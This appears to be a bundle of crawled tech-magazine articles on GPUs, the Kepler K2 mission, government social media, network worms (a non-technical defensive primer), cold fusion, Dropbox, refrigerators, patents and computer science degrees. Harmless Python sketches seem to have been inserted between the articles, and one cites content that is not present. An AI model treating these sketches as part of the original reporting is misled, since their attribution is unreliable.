arbitrary access to large amounts of memory off-chip are not well suited to the GPU architecture.” Today's GPUs are power hungry. But designers, faced with the growing demand for mobile computing, are rapidly evolving chip architectures to develop low-power versions that will approach the performance of high-end workstations. What's in the Pipeline “GPUs are beginning to more closely resemble CPUs with every evolution,” notes Johnson. “The drawbacks for general-purpose programming are being tackled by the industry, one by one.” Next-generation CPU architectures are adopting many features from GPUs. “Emerging architectural designs such as those found in Stanford's Merrimac and the IBM-Toshiba-Sony Cell processor look similar to the architecture of GPUs,” says Johnson. “These designs could be the next-generation technology for real-time, data-processing applications. Our work with GPUs will help us evaluate and deploy the emerging devices.” The Cell processor, which is a crossover GPU-CPU chip, is scheduled to hit the gaming market soon. But the Cell might also prove to be useful in defense and security computing environments. The scientists of GAIA — just like the gamers — are eager to test and scale its limits. Credit must be given to the University of California, Lawrence Livermore National Laboratory, and the Department of Energy under whose auspices the work was performed, when this information or a reproduction of it is used.
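The convolution case mentioned above is worth seeing in miniature. The following CPU-side Python/NumPy sketch is not GPU code; it simply shows why the workload parallelizes so well: every output pixel depends only on its own small neighborhood, so each one is an independent task of the kind a SIMD pipeline can execute in bulk.

import numpy as np

# CPU-side sketch of why image convolution maps so well onto GPU pipelines:
# every output pixel is computed independently from its own small neighborhood,
# with no shared state between tasks. Real GPU versions would be written as
# shader or CUDA kernels; this loop only illustrates the data dependencies.
def convolve(image, kernel):
    kh, kw = kernel.shape
    out = np.zeros((image.shape[0] - kh + 1, image.shape[1] - kw + 1))
    for y in range(out.shape[0]):
        for x in range(out.shape[1]):          # each (y, x) is an independent task
            out[y, x] = np.sum(image[y:y + kh, x:x + kw] * kernel)
    return out

blur = np.ones((3, 3)) / 9.0                   # simple 3x3 averaging kernel
image = np.random.rand(8, 8)
print(convolve(image, blur).shape)             # (6, 6)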
After spinning out of control, the Kepler Space Telescope is using the power of the sun to continue its search for Earth-like planets. NASA announced that even though the space telescope is down from four to two working wheels, the agency has approved a plan that will keep Kepler working for at least another two years. This newly reconfigured mission has been dubbed K2. The telescope, launched in 2009, lost the use of one of the four wheels that control its orientation in space in May 2013. That was the telescope's second wheel failure. With the loss of the second wheel, NASA could no longer manipulate the telescope's positioning, and ground engineers struggled to communicate with it since the communications link went in and out as the spacecraft spun uncontrollably. Several months later, NASA engineers reported that they were unable to get the two disabled wheels working properly again, so Kepler would be unable to continue its original planet-hunting mission. At that point, NASA was working to figure out what other scientific research -- like searching for asteroids, comets or supernovas -- Kepler could do in its diminished capacity. However, scientists came up with a way to keep the telescope focused on its original planet-hunting mission. Engineers, according to NASA, discovered they could use the sun's radiation pressure to actually balance the telescope in space. Photons of sunlight exert pressure on the spacecraft, NASA explained. If the telescope is positioned exactly, it can be balanced against the pressure like a pencil can be balanced on your finger. That means the telescope can be positioned without the use of the two damaged wheels. The spacecraft will be rotated periodically to prevent sunlight from affecting the telescope lens. The spacecraft will be able to focus on a specific part of the sky for about 83 days. After that point, the telescope will be rotated to protect it from the sun. NASA expects Kepler to complete four of these studies every year. The first K2 science observation is set to begin May 30. The new mission comes with two years of funding to continue the hunt for Earth-like exoplanets. However, it also calls for Kepler to observe notable star clusters, young and old stars, active galaxies and supernovae. Even if Kepler had not been able to get back to work, William Borucki, the Kepler mission's principal science investigator, noted last year that the space telescope had already sent back enough data to keep scientists busy for another two to three years. "The Kepler mission has been spectacularly successful," Borucki said. "With the completion of Kepler observations, we know the universe is full of Earth-like planets.... The most exciting discoveries are going to come in the next few years as we analyze this data." He added that he expected that within two years scientists should be able to answer the question of whether Earth is unique or a common kind of planet in our galaxy. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed.
Social media is here to stay. There is no question about that, especially after Facebook reached 1 billion users and Twitter surpassed the 500 million-account mark. What is less clear, however, is how government organizations can respond to the changing communication demands of citizens who want government to use social media in a meaningful, interactive and engaging fashion. Agencies face a tough challenge: Citizens demand participation and responsiveness via social media – otherwise they complain or even mock government. But organizational missions and standard operating procedures do not allow for the fast and furious back-and-forth conversations on social networking sites. Instead, they mostly see social media as an additional channel for providing information to an audience that prefers to receive news and updates in a newsfeed. After all, government organizations are not in the business of competing for followers, fans, or to create peaks and spikes in their online communication. They are also not looking for volunteers, donors, or new customers whose interest they most spark over and over again to keep them coming back and buying their products. In general, government missions are much simpler and focus on providing a trustworthy public service upon which citizens can rely. The existing information and communication paradigm is highly hierarchical with standard operating procedures that don’t necessarily support the 140-character news cycle. Instead, blog posts, Facebook and Twitter updates have to be carefully crafted to avoid confusion, rumors, and misinformation. There is rarely an update that goes out without revisions and explicit approval after carefully considering the potential impact or consequences. In this risk-averse communication environment, social media constitutes a departure from the existing standards. Agencies' current approach to using social media focuses on broadcasting pre-existing information. They don't use social media channels to replace traditional media, instead they add social media channels to the mix and to share content that is also available through other channels, such as websites or mailings. Rarely do agencies and departments venture out to actively interact and engage in a conversational style in their newsfeeds on social media. A colloquial tone, sarcasm or jokes -- the Internet’s fuel -- can be misinterpreted or may even lead to misunderstandings. Many social media innovations develop as government officials experiment with different tactics, gain more experience, learn what tactics work and what should be avoided in the future. In this new problem space, in which regulations and rules follow the changes in observed online behavior of citizens, it is necessary to create functions and standard operating procedures that help government agencies interact online. GSA has taken a first step and provides guidance on HowTo.gov: The social media registry was launched earlier this year. The tool allows government users to register their official social media accounts, so that journalists and researchers can verify their authenticity. This increases confidence in the nature of the account. Similarly, internal workflows for crafting, reviewing, revising, and scheduling social media messages need to be designed to reduce the risks associated with the professional use of social media. An example is the recently launched “Measured Voice” social media workflow tool. 
Jed Sundwall, who presented the tool at the "Code for America Summit" in San Francisco in October, describes Measured Voice: "Government needs to be thoughtful about their social media postings. Agencies can't post in real time answers to Facebook's 'What is happening?'. Instead, they have to be measured, reliable and accessible. They don't have to draw attention to themselves." Sundwall, a contractor working on USA.gov and gobiernoUSA.gov, noticed early on that government agencies need a tool to organize their collaborative workflow in a distraction-free environment to craft social media messages. The "Measured Voice" platform allows editorial teams to go back and forth during the editing process. Each team can define different roles: for example, writers craft the initial message, and editors then rewrite and approve before the final messages are posted to an agency's social media platform. The platform -- kept simple outside of Facebook and Twitter to avoid distractions -- also helps to schedule updates, a feature that is especially important for avoiding distractions from other important tasks government has to perform, for example emergency management situations or face-to-face interactions with citizens.
Source: Screenshot provided by Jed Sundwall, Measured Voice
Social media updates -- which fit into 140 characters on Twitter, or a few lines on Facebook -- absorb more time than a press release, which allows more space for longer explanations. Sundwall points to a recent FBI update on Twitter that was carefully crafted and provided all the necessary information to defuse the rumor that computers were stolen. As citizens and government experts become more social media savvy, they will focus their activities more on networking opportunities that citizens demand and social media platforms support. Government organizations will also invest more in understanding if they are truly reaching the right audiences. Measuring the impact of social media interactions is therefore a core task that every agency should carefully consider. All social media interactions need to serve one purpose: to fulfill the mission of the organization. Only if online interactions are designed to support the mission will they provide both tangible and intangible benefits for government and its diverse audiences. Government agencies are just now starting to think about metrics that go beyond the quantitatively measurable insights, such as the number of retweets a Twitter update receives, or the number of Facebook comments citizens are willing to leave. There is, however, more: social media engagement can be measured on different levels of an engagement scale.
- The number of retweets a Twitter update receives is an important indicator of short-term attention paid to a specific update or event and is mostly context-relevant.
- The number of followers and "likes" can indicate long-term community building and the degree to which citizens will actively follow updates -- an indication of continuing interest in government updates.
- Leaving comments or actively asking questions shows even more engagement -- and at times even concern for mission-related issues.
Attracting too much attention, however, is not in the interest of most agencies (except emergency management agencies that are involved in ongoing disaster relief and prevention). Instead, for most agencies a continuous attention curve without many spikes and peaks is the best indicator that they are providing a reliable information flow to their audiences.
As Sundwall notes “Government agencies are not out to advertise for ‘The best driver’s license in town’-attraction and don’t need to draw attention to their operations.” Measured voice therefore looks at the 100-message average in attention and provides feedback to its users in the form of smileys. But don’t make them smile too much; there might be too much good or bad press waiting for you! Metrics have become an invaluable source of real-time information for government -- when they measure the right type of engagement. Moreover, measuring for the sake of data accumulation will not help social media managers make their case. Instead, data needs to be carefully interpreted. Based on the insights government agencies should adjust their social media tactics. Government users can sign up for the private beta of Measured Voice at http://measuredvoice.com/govbeta.
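One way to picture the 100-message average Sundwall mentions is a rolling window of per-update attention scores. The Python sketch below is purely illustrative; it does not reflect Measured Voice's actual implementation, and the scoring (retweets plus comments) and the spike threshold are invented for the example.

from collections import deque

# Illustrative rolling-window take on the "100-message average": track a simple
# attention score per update, compare each new update to the window's average,
# and flag unusual spikes. All numbers here are made up for the example.
class AttentionTracker:
    def __init__(self, window=100):
        self.window = deque(maxlen=window)

    def add(self, retweets, comments):
        score = retweets + comments
        average = sum(self.window) / len(self.window) if self.window else score
        self.window.append(score)
        return "spike" if score > 2 * average else "steady"

tracker = AttentionTracker()
for rt, c in [(4, 1), (3, 2), (5, 0), (40, 12)]:
    print(tracker.add(rt, c))   # steady, steady, steady, spike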
Primer: Network Worm
By Kevin Fogarty | Posted 2005-01-13
How a network worm infects your computers.
Isn't this just a regular worm? Yes, but there is more than one meaning for "regular." E-mail worms and viruses are designed to spread by using the e-mail system itself as a carrier. A network worm is more insidious. It might arrive via e-mail, but could also slip in attached to files in a portable hard drive, a flash-memory stick, a PDA or, increasingly, a cell phone.
Why the distinction? Because it's possible to screen out most, if not all, e-mail worms and viruses using virus scanners at the firewall or on the e-mail servers. But network worms can come in via pathways that become more numerous with every advance in mobile computing, wireless networks and smart phones. Many companies aren't sufficiently aggressive about virus screening inside the firewall. So network worms not only have more ways to get into a corporate network, but once they're in, they're more likely to be free to operate uninterrupted.
How does a network worm attack? Most simply copy themselves to every computer with which the host computer can share data. Most Windows networks allow machines within defined subgroups to exchange data freely, making it easier for a worm to propagate itself. Some worms can also lodge in the startup folder of a networked computer, launch when that computer is restarted and reinfect a network that may have already been cleaned out. A worm that lodges in a server can infect every user who logs on to that server.
How can it affect cell phones? Russian cybersecurity firm Kaspersky Labs recently identified a network worm called Cabir that can infect a cell phone running the Symbian operating system by posing as a security utility. The worm can change the phone's operating system so it is launched every time the phone is turned on, then propagate itself to other phones via Bluetooth wireless connections. No infections have been reported so far.
How do you fix infected computers? Manually, by shutting down the network and going to each infected computer to delete the offending files, then erasing the System Restore data to make sure it won't reinfect a cleaned machine. Or buy a sophisticated virus-scanning application that will sit on each computer and server and clean it of anything that resembles worm or virus code.
What's the solution? Pretty obvious: Buy a good enterprise virus-scanning utility that will monitor activity inside your network as well as data coming in through the firewall. Once they've cleaned out an existing infection, virus scanners continue to watch the network for other threats. Make sure you set all machines to download the most recent worm and virus filters automatically.
Just over a year ago I wrote about something that was incredibly exciting: a commercial cold fusion power generation system. Assuming it worked as claimed, the cold fusion power generation system would herald huge changes in not only the energy industry, but pretty much every aspect of the global economy. In IT, practical cold fusion generators could, in theory, power entire data centers for next to no cost and provide power in locations far from the grid. And the existing power grid would, itself, be potentially obsoleted by fusion power generation. As for the impact on transportation ... imagine a car that could be driven from coast to coast several times without refueling for a few cents! That's the promise of cold fusion power. Note that cold fusion is often termed "Low Energy Nuclear Reaction" (LENR) these days, but I'll stick with cold fusion for this article. Before I update you on where we've got to in this story, let me first explain the background for those of you who might not be up on the story. Those of you who are "au fait" may care to skip ahead. The generation of energy by fusion is based on the theory that if you can persuade the nuclei of atoms to "fuse" together such that a new, heavier nucleus is formed, you will generate energy ... a lot of energy. The reason for this output is that some proportion of the mass involved in fusion is converted to energy. Now, there are two ways, at least in theory, to achieve fusion. The most publicized and the technique with vastly more research dollars attached to it is "hot" fusion. Hot fusion attempts to emulate the conditions found in stars and so involves temperatures and pressures that are simply mind boggling. Hot fusion is the goal of projects such as the National Ignition Facility which, along with the likes of the Large Hadron Collider, are fine examples of "big science." The NIF has cost, so far, in excess of $3.54 billion (the LHC is even more spendy, with a price tag of "$9bn ... as of Jun 2010"). Hot fusion is, if you're a geek, sexy. It involves enormous machines the size of houses, enough power to run a large city, and swarms of lab-coated acolytes to prepare and run the equipment, which, to date, has completely failed to generate more power than is put into it; producing more power than is consumed is the goal (called "over unity"). Cold fusion, on the other hand, is, theoretically, fusion that can occur at "normal" temperatures (i.e. room temperature ... although I guess where you set your thermostat makes that a little vague) and "normal" pressures. The concept of cold fusion goes back to the 1920s, but the general public really only became aware of the idea in the late 1980s when two respected electrochemists, Martin Fleischmann of the University of Southampton and Stanley Pons of the University of Utah, announced they had detected "anomalous heat production" in a laboratory setup orders of magnitude simpler than the equipment used by today's hot fusion researchers. Alas, the results of Fleischmann and Pons's experiment proved very difficult to replicate and the entire cold fusion field fell into disrepute. Moreover, those who gave the concept of cold fusion any credence after the discrediting of Fleischmann and Pons were ridiculed and ostracized. Even being interested in cold fusion could potentially end an academic science career. So, for the last two decades, research into cold fusion has been the province of a handful of maverick researchers. And thus we come to last year's Backspin column on cold fusion.
At that time, an Italian inventor by the name of Andrea Rossi had been slowly gathering attention for a device he called the "E-Cat" (short for Energy Catalyzer). How the E-Cat works has never been revealed and, despite the involvement of several respected scientists, the question of whether the E-Cat really functions as claimed has yet to be resolved. On Oct. 28 last year Rossi held a demonstration in Bologna, Italy, of a 1 megawatt plant, but due to unexplained problems, the power output was only half that, and the fact that a running half-megawatt generator was connected to the E-Cat setup for the entire time and that no one was allowed to inspect the setup made the entire event totally inconclusive. Since then Rossi has made numerous announcements about significant technological advances and pricing of commercial products, but it's all still "jam tomorrow" (an expression for a never-fulfilled promise from Lewis Carroll's Through the looking glass. Rossi now has as many critics as he does believers and has been repeatedly accused of being a fraud and a con man. Even so, despite this negative press, he still claims to be moving forward. He recently held a meeting of his worldwide licensees in Zurich, Switzerland, which indicated that his company, Leonardo Corporation, has, in fact, developed a surprising level of commercial credibility without a demonstrably provable product. Over this same period a number of other companies have announced plans to build and sell commercial cold fusion products but, to date, there's nothing you can buy from Rossi or anyone else. In fact, no cold fusion system has been proven to work at a level that could be called practical or even verifiably over unity. One of the more encouraging tests of a cold fusion solution was recently conducted by Defkalion, a Greek company. The test was witnessed by a respected scientist, Michael A. Nelson, and seemed to show that excess heat was being produced, albeit with the caveat that a lot of additional testing would be required to confirm the results. So, the big question is still whether there is such a thing as cold fusion that generates more power than is input, or whether it is due to some other more conventional chemical process. This has become a matter of huge and often heated debate. A recent paper, unpublished until now, by Dr. Kirk L. Shanahan, of the Savannah River National Laboratory, titled "A Realistic Examination of Cold Fusion Claims 24 Years Later," is heavy reading but well worth it for its highly critical and detailed analysis of the reality of cold fusion. Dr. Shanahan's conclusion is not in favor of cold fusion: "The case for cold fusion (or 'LENR') stands as unproven today. That fact will remain for all time. If tomorrow, someone discovers the reproducible formula for generating low energy nuclear reactions ... that fact will not change. The failure of some scientists to obtain [cold fusion] does not prove [cold fusion] does not occur, because their work can always be criticized as being inadequate. Thus, the possibility that cold fusion exists will always be open. The only thing that science can do is show how to reproducibly get an effect. Therefore, it is likely that claims to have discovered the way to get LENRs will persist for a long time. However, there is a big difference between claiming (or asserting) something, and proving it." 
That really underlines the difference between cold fusion fan boys, who completely believe in its existence, and those who remain skeptical and demand proof in the form of useful technology, by which I mean a technology that delivers real, valuable commercial results. This is something that no one -- not Rossi's Leonardo Corporation, not Defkalion, nor any of the other players in the market -- has yet managed to do. So, whether something that might or might not be cold fusion exists and is useful in practical terms isn't yet a dead issue, but as of now, a year later, it's all still jam tomorrow. Read more about data center in Network World's Data Center section. This story, "Cold Fusion a year later" was originally published by Network World.
Dropbox In The Classroom: 4 Great Uses
Dropbox's cloud-based service does more than basic storage jobs for educators, with no IT help required.
When Dropbox arrived on the scene in the fall of 2009, it was aimed at consumers. But today, some of Dropbox's 100 million-plus users worldwide are students and teachers, who use the Web storage and file synchronization service in a variety of ways. Because it is a browser-accessible Web service, Dropbox needs little in the way of IT intervention, and can be used by students on campus and off. And because it offers clients for Windows, Mac and Linux -- as well as Android, iOS and BlackBerry smartphones -- any student can use Dropbox, regardless of device. Here are four great uses for Dropbox in the classroom.
1. Sharing Stored Files. In the early days, some educators probably turned to Dropbox simply because their school's own networking setup lacked such a feature. Anecdotal reports suggest that schools now are sanctioning the use of cloud services like Dropbox. Last year, Dropbox launched a program called Space Race, offering people with an .edu email address an extra 3 GB of storage -- on top of the 2 GB of storage all users get. At this writing, it is not clear if Dropbox will offer Space Race again this year.
2. Overcoming Email Limitations. Over-size attachments, such as large PowerPoint files and videos, that never reach their intended recipient because the email program chokes on the file are a common complaint of email users. Dropbox essentially solves this problem by bypassing email.
3. Turning In Homework. In its simplest application, Dropbox can be used as a common filing cabinet through which teachers can provide documents, such as homework assignments and handouts, and media files for the entire class. But another popular use goes in the opposite direction, from students to teachers. Using Dropbox as a homework drop has the added benefit of providing, by default, a time-stamp for these submissions (see the short folder-listing sketch after this article). Of course, students can share Dropbox folders with each other too, and so collaborate on joint assignments. Happily, the free version of Dropbox saves a history of all deleted and earlier versions of files for 30 days. Paid Dropbox Pro accounts have a feature called Packrat that saves file history indefinitely.
4. Easy Saves From Popular Apps. Quite a number of popular productivity and educational applications now feature a Dropbox "sync" option. Evernote, for example, has a "save to Dropbox" option. Other popular education apps with Dropbox integration include Notability, iThoughtsHD and Ghostwriter Notes.
A free Dropbox account includes 2 GB of space. Users can earn more free space in a variety of ways. Also, more storage can be purchased via monthly or annual plans. For institutions needing even more storage, there is Dropbox for Teams, which adds a number of advanced account security and management options, as well as unlimited storage. Pricing for Dropbox for Teams starts at $795 for up to 250 licenses.
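As a small illustration of the homework-drop time stamp mentioned in item 3, the Python sketch below lists every file students have placed in a shared, synced Dropbox folder together with its modification time. The folder path is an assumption standing in for whatever shared folder a class actually uses, and the sketch relies on the desktop sync client rather than the Dropbox API.

import os
from datetime import datetime

# Teacher-side sketch of the "homework drop": list every file in a shared,
# synced Dropbox folder along with its modification time, which serves as the
# hand-in time stamp. The folder path is an assumed example.
DROP_FOLDER = os.path.expanduser("~/Dropbox/Period3-Homework")

def submissions(folder=DROP_FOLDER):
    for entry in sorted(os.scandir(folder), key=lambda e: e.stat().st_mtime):
        if entry.is_file():
            stamp = datetime.fromtimestamp(entry.stat().st_mtime)
            yield entry.name, stamp.strftime("%Y-%m-%d %H:%M")

for name, handed_in in submissions():
    print(f"{handed_in}  {name}")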
Refrigerators took a long time to become commonplace The first household refrigerator powered by electricity was called the Domelre, a name derived from “domestic electric refrigerator.” Chicago inventor Fred Wolf conceived the appliance as an improvement on the incumbent icebox that was a familiar fixture in turn-of-the-century homes. Buyers would mount the unit atop their iceboxes, where it kept select food items cooler for longer than its underlying companion. The fact that the 1913 Domelre offered only a modest improvement to an existing appliance was one reason for a relatively cool reception. Another was its cost. The Domelre’s price of $900, at the time equal to 7 percent of the average U.S. household’s income, put it out of reach for most people. Even a more advanced successor, a self-contained unit produced by the Detroit-based Guardian Refrigerator Co., failed to gain traction. Two years after the first Guardian was built, according to a history of refrigeration maintained by Wright State University, the company had produced fewer than 40 units. Still, the concept of mechanical refrigeration was intriguing. The prevailing approaches for acquiring and maintaining food – daily visits to the market, morning deliveries from the milkman and the hauling around of heavy ice blocks – cried for improvement. Or so believed W.C. Durant, the president of General Motors. He bought the Guardian Refrigerator Co. in 1918, renamed it Frigidaire Corp., and replaced Guardian’s laborious, manual production process with the same sort of mass production techniques GM had applied to automobiles. GM wasn’t the only big believer. By the early 1920s, Detroit’s Kelvinator and General Electric Co. were also building refrigerators, convinced that Americans – or at least wealthy Americans – would gladly discard their iceboxes. Yet for all of its revolutionary qualities, mechanical refrigeration was no overnight sensation. It took roughly 30 years after the introduction of Wolf’s Domelre for refrigerators to reach half of U.S. homes. Even after applying a more charitable starting point – the 1918 introduction of GM’s Frigidaire – it still took 25 years for the refrigerator to reach the 50 percent penetration mark. Refrigerators didn’t hit 70 percent penetration until the early 1950s, more than 30 years after their commercial debut. One factor contributing to the prolonged ascension of household refrigeration was price. For much of its early history, the household refrigerator we now take for granted was affordable only for wealthy families. In 1924, GM’s $1,000 Frigidaire engulfed nearly 8 percent of an average family’s annual income. Today, Best Buy sells a $359 entry-level refrigerator that costs less than 1 percent of what an average U.S. household earns. There are numerous contributors to adoption rates associated with modern technologies, but as Federal Reserve Bank economist W. Michael Cox has observed, one of the most important is the relationship between costs and earnings. In 1984, the average U.S. worker had to put in 435 hours to earn enough money to buy a personal computer – one reason hardly anybody did. Today, about 25 hours of work at the average wage will do it. That has helped boost household computer penetration to 80 percent. The same dynamics affect video technologies. Easy affordability was one reason the DVD player became the champion of video technology adoption, achieving 70 percent penetration just six years after its commercial introduction in 1998. 
At less than $100 for many models, DVD players are affordable to almost anyone. The same can’t be said about the latest rage in video: 3-D. The least-expensive 3-D TV sets are priced at close to $2,000, more than what the average household spends on clothing in a year. Worse, 3-D sets are coming to market smack in the middle of an existing upgrade cycle for HD sets. History tells us that if 3-D is to achieve mass-market appeal, it will need to deliver more than stunning visual experiences. As compelling as those may be, they’re really just incremental enhancements to a pretty good TV experience already available through digitally connected HD sets. To really take off, 3-D video technology needs to do what refrigerators did: chill out on the cost. Addendum: My November/December 2009 column credited Jones Intercable of Augusta, Ga., with launching one of the first fiber-optic transmission networks for cable TV in the late 1980s. Equal billing should have gone to Time Warner Cable’s Oceanic Cablevision in Honolulu, which activated a fiber supertrunk in 1988. Thanks and “Aloha” to Oceanic Time Warner Cable vice president of engineering Michael Goodish for the clarification.
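As a footnote, the affordability yardstick used throughout the column, price as a share of annual income or as hours of work at the average wage, is simple to compute. The short Python sketch below uses assumed, illustrative figures rather than the column's exact data.

# Affordability of an appliance, measured two ways: share of annual income
# and hours of work needed to earn the purchase price.

def share_of_income(price, annual_income):
    """Price as a percentage of annual household income."""
    return 100.0 * price / annual_income

def hours_of_work(price, hourly_wage):
    """Hours of work at a given wage needed to earn the price."""
    return price / hourly_wage

if __name__ == "__main__":
    # Illustrative, assumed figures (not from the article): a $359 entry-level
    # refrigerator against a $60,000 household income and a $25/hour wage.
    print(round(share_of_income(359, 60_000), 2), "% of annual income")
    print(round(hours_of_work(359, 25), 1), "hours of work")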
<urn:uuid:9495abb8-3675-4d4f-bc82-c09f67345201>
CC-MAIN-2017-09
https://www.cedmagazine.com/article/2010/01/memory-lane-coolest-technology-ever
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00456-ip-10-171-10-108.ec2.internal.warc.gz
en
0.956979
992
2.9375
3
The biggest recent splash is the Apple patent suit against some of Samsung’s Android devices. Turn on the news, read the newspaper, pick up your smartphone, and what do you see? Presidential politics and patent suits are there nonstop. I refuse to comment on the former, so that leaves the latter. While I have been serving as an expert witness in patent suits since 1994 and have picked up a lot of “layman’s knowledge,” I am not an attorney. I can’t give legal opinions. And patent law is constantly changing – sometimes by acts of Congress, sometimes due to new interpretations by courts of existing laws. So you need to engage a good patent attorney for an up-to-date opinion on serious matters. The U.S. Constitution establishes patents in Article I, the enumerated powers of Congress, Section 8: “The Congress shall have power … to promote the progress of science and useful arts, by securing for limited times to authors and inventors the exclusive right to their respective writings and discoveries.” Given that this is an election year, it would be a good idea to read the U.S. Constitution. Article I, Section 8 gives Congress the power to establish patent and copyright laws. Because it’s a constitutional issue, patent cases are tried in federal court and can be appealed all the way to the Supreme Court. A patent is the right to exclude someone from making, selling or using a patented invention. Yes, even using! So if you own a device that has been found to infringe a patent, you infringe the patent just by using the device. This extends to importing, offering for sale, and even suggesting others do these things under certain circumstances. A patent is a deal between an inventor and society that grants a monopoly for a limited period of time for practicing the invention of the patent in exchange for a clear and complete description of how the invention works, so that anyone can legally practice the invention after the patent expires. The length of time is set by Congress and can be changed. It is currently 20 years from the date the patent is filed. The “right to exclude” is enforced by bringing a lawsuit. If a patent owner is unwilling to bring a lawsuit, the patent is useless. The government does not enforce the patent, a court of law considers the accusation of infringement, and a jury makes a determination of whether infringement takes place and determines how to cure the inequity. As a practical matter, bringing an infringement suit is very expensive. There is no point in doing this unless it can be proven that the patent holder suffered significant “damages” by the infringer. To be patentable, an invention must be useful, novel and non-obvious. Useful means it must work. Novel means it hasn’t been invented before. And non-obvious means that a practitioner of ordinary skill must find it to not be an obvious combination of existing elements. Two broad categories of patents are “utility patents” and “design patents.” A utility patent covers either an apparatus or a method of doing something (or both). A design patent covers the physical appearance of a device. Engineers are generally more concerned about utility patents, and product designers and artists focus on design patents. Perhaps the biggest recent splash is the Apple patent suit against some of Samsung’s Android devices running Google software. The suit was tried in the U.S. District Court for the Northern District of California. It was a jury trial. The jury took surprisingly little time to issue its guilty verdict. 
The jury determined that the accused Samsung devices infringed three utility patents: 7,469,381, 7,844,915 and 7,864,163. The jury also found that Samsung’s accused devices infringed some design patents. All accused devices infringed D604,305, while some accused devices infringed D618,677 and D593,087. But no accused Samsung products infringed D504,889. Because a patent must be a teaching document, well-written patents (not all of them are) can be used as an educational tool. A good patent describes the current state of the art (yes, the proper term is “art”), lists what is deficient about the current situation and briefly explains how the invention solves problems in the state of the art. Then the patent must describe, in clear detail, how to practice the invention. In years past, a copy of a patent had to be ordered from the U.S. Patent and Trademark Office or a service providing copies of patents for a fee. The USPTO maintained sets of copies in a number of libraries. If you needed the patent copy quickly, you paid extra. Then fax machines facilitated faster access. Today, copies can be downloaded from the USPTO or in PDF form from Google Patents at no charge. I would encourage downloading a couple of these patents, both the utility and design patents, to get a feel for how they are constructed. I would recommend the Nolo Press book “Patent it Yourself” by David Pressman. But I don’t recommend patenting your invention yourself! The book is a great introduction to the process, but you need a professional to protect your rights.
<urn:uuid:5f1b2cc1-cfb3-4a49-85a5-0c213c62094f>
CC-MAIN-2017-09
https://www.cedmagazine.com/article/2012/09/cicioras-corner-patent-wars
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00456-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938976
1,100
2.53125
3
Two candidates apply for a software development position: One has a degree in computer science from a prestigious school. The other is self-taught with several years' experience under his belt. Which one gets the job? Of course, there's no definitive answer to this question, but it's one that CIOs are increasingly going to have to think about. That's because more and more software developers – and very skilled and competent ones at that – are entering the job market without any degree-level training. By contrast, around 73 percent of Java and C# devs have computer science degrees, and about 65 percent of C and C++ devs. The survey found that Massively Open Online Courses (MOOCs) offered by the likes of Coursera, Udacity and Khan Academy are playing an important role in helping would-be developers develop skills in Swift and other languages such as Python and Ruby. Many MOOCs also offer courses in iOS and Android app development, Web development and data science. What's notable about developers who have studied a language through a MOOC is that many of them already have bachelor's degrees of some sort or another, and many were already software developers. "The typical Coursera learner taking a programming or other technology course has a bachelor's degree, is currently employed, and is between 22 and 35 years of age," says Kevin Mills, a Coursera technology vertical manager. "Among these learners, it is about an even split between those looking to begin a new career in programming versus those seeking to advance their existing programming skills." That's echoed by Oliver Cameron, vice president of engineering and product at Udacity. He says the company sees a lot of programmers come to Udacity to learn new programming languages or gain new skills in languages they already work with. "But we also see a lot of people in nontechnical fields like event management or art or music learning to code with Udacity and making the leap to a full-time technical job," he adds. As an alternative to MOOCs, some would-be professional coders are also turning to intensive "coding boot camps" which often last just a week or two, focusing on specific coding skills. The idea of employing a developer who is self-taught or who has attended a boot camp or online course may be alarming – after all, who would want to consult a physician who hadn't been through medical school? Jan-Martin Lowendahl, an education analyst at Gartner, points out that computer science courses teach much more than specific language skills. "At university in a computer science course the emphasis is on learning skills like programming logic, not particular languages. You get much more depth on a computer science degree course." The flip side of this is that there is great inertia when it comes to the actual languages that are taught – many still teach FORTRAN, he adds. There's an argument to be made, however, that teaching FORTRAN is a little like teaching Latin to language students: Studying it may not be useful in its own right, but it brings a deep and broad understanding of the discipline as a whole, and makes learning to code in other languages more efficient.
Who's got time (and money) for a full degree?
That may be true, but studying for a computer science degree is a luxury that many people can't afford – both financially, and in terms of time – particularly if they already have a bachelor's degree.
"Many people simply don't have the time to go to [college] to learn new skills, and there is a question mark over the value of a formal diploma in a fast-changing world," says Lowendahl. "At the same time, software development has always been a realm that is suited to self-teaching and learning by doing. People who are drawn to software development tend to be good self-learners." [Related: 5 tips to avoid scaring away top tech talent] Daun Davids is a good example of this type of software developer. She earned a bachelor's degree in computer science and worked as a software engineer for many years before taking time off to homeschool her children and finish her master's degree in Computational Science and Robotics. When this was finished, she decided that she was interested in resuming her programming career as an Android developer. "I was trying to learn Android development on my own but most of the information I found was very basic or outdated. Then I saw that Coursera was starting a Mobile Cloud Computing with Android specialization so I signed up," she says. The course took a year to complete and Davids says she then found work almost immediately as a freelance Android developer. Aaron Pollack is another example. While working doing tech support for a startup he began learning Python in his spare time – through self-study, using a tutor he found on Craigslist, on two six-week courses offered by Coursera, and at a coding boot camp. "Doing the algorithms classes on Coursera made me a stronger applicant for the bootcamp and for jobs afterwards," he says. "But I really learned programming by hacking on different apps, going to events and meetups, and bothering as many people as I could about technology." While attending computer science courses at a college may cost tens of thousands of dollars per year, anyone can learn to code for the price of a text book, or for free, by accessing online courses offered by MOOCs. For a more formal qualification, MOOCs offer qualifications for far less than typical university fees. For example, Udacity offer courses leading to a "nanodegree" qualification for $199 per month, with half refunded if the course is completed in under a year, or a course with a guaranteed job within six months of graduation – or a full refund – for $299. So ... degree, or no degree? So going back to the original question, which is more attractive: someone with a computer science degree or someone with more quickly acquired but more language specific coding skills? "You certainly get more depth of learning with a computer science degree, but shorter courses have an emphasis on more current skills," says Gartner's Lowendahl. "When it comes to productivity and ingenuity, you can get that from either type of course. At the end of the day it comes down to a person's competence and grit," he says. This story, "Who needs a computer science degree these days?" was originally published by CIO.
<urn:uuid:b2dbcb41-32dd-4d48-bc6c-d32a689cc640>
CC-MAIN-2017-09
http://www.itnews.com/article/3025349/careers-staffing/who-needs-a-computer-science-degree-these-days.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.972914
1,353
2.953125
3
